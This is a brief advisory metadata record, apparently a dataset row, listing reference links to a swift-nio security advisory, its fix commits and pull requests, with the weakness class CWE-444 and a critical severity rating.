[{'type': 'WEB', 'url': 'https://github.com/apple/swift-nio/security/advisories/GHSA-mgc4-wqv7-4pxm'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio/pull/1387'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio/pull/1388'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio/commit/8da5c5a4e6c5084c296b9f39dc54f00be146e0fa'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio/commit/bfde40cac8eca25ce021552513b20ee23fc6e306'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio/commit/df9390006bce7da1b6273f804d3acbbfdfcc6154'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio/commit/f94b22b506e3557cb1b325534fa9bbcd39c90246'}, {'type': 'PACKAGE', 'url': 'https://github.com/apple/swift-nio'}]
|
{'cwe_ids': ['CWE-444'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-18T17:29:43Z', 'nvd_published_at': None}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.